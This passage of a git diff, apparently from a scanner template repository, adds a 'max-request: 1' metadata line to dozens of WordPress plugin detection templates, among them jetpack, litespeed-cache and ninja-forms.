a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/intuitive-custom-post-order/ metadata: + max-request: 1 plugin_namespace: intuitive-custom-post-order wpscan: https://wpscan.com/plugin/intuitive-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/iwp-client.yaml b/http/technologies/wordpress/plugins/iwp-client.yaml index 24fc3e3295..a36016562d 100644 --- a/http/technologies/wordpress/plugins/iwp-client.yaml +++ b/http/technologies/wordpress/plugins/iwp-client.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/iwp-client/ metadata: + max-request: 1 plugin_namespace: iwp-client wpscan: https://wpscan.com/plugin/iwp-client tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index 3e89505574..8033aacbc6 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack-boost/ metadata: + max-request: 1 plugin_namespace: jetpack-boost wpscan: https://wpscan.com/plugin/jetpack-boost tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index e701e365ba..e4017b1a0a 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/jetpack/ metadata: + max-request: 1 plugin_namespace: jetpack wpscan: https://wpscan.com/plugin/jetpack tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index c0cc5400a8..53d6d393bd 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kadence-blocks/ metadata: + max-request: 1 plugin_namespace: kadence-blocks wpscan: https://wpscan.com/plugin/kadence-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 22687bcffe..c286e9a14f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/kirki/ metadata: + max-request: 1 plugin_namespace: kirki wpscan: https://wpscan.com/plugin/kirki tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index b69d3d5bfe..364e3cd71e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/leadin/ metadata: + max-request: 1 plugin_namespace: leadin wpscan: https://wpscan.com/plugin/leadin tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 7975a57702..4fcccbfc33 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts-reloaded/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts-reloaded wpscan: https://wpscan.com/plugin/limit-login-attempts-reloaded tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index ff4cef94d7..3fbc714d3b 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/limit-login-attempts/ metadata: + max-request: 1 plugin_namespace: limit-login-attempts wpscan: https://wpscan.com/plugin/limit-login-attempts tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index a8903697b0..c49b506979 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/litespeed-cache/ metadata: + max-request: 1 plugin_namespace: litespeed-cache wpscan: https://wpscan.com/plugin/litespeed-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index 3f141c4476..dfcaf6f71b 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loco-translate/ metadata: + max-request: 1 plugin_namespace: loco-translate wpscan: https://wpscan.com/plugin/loco-translate tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 5355e988a2..61be246fee 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ 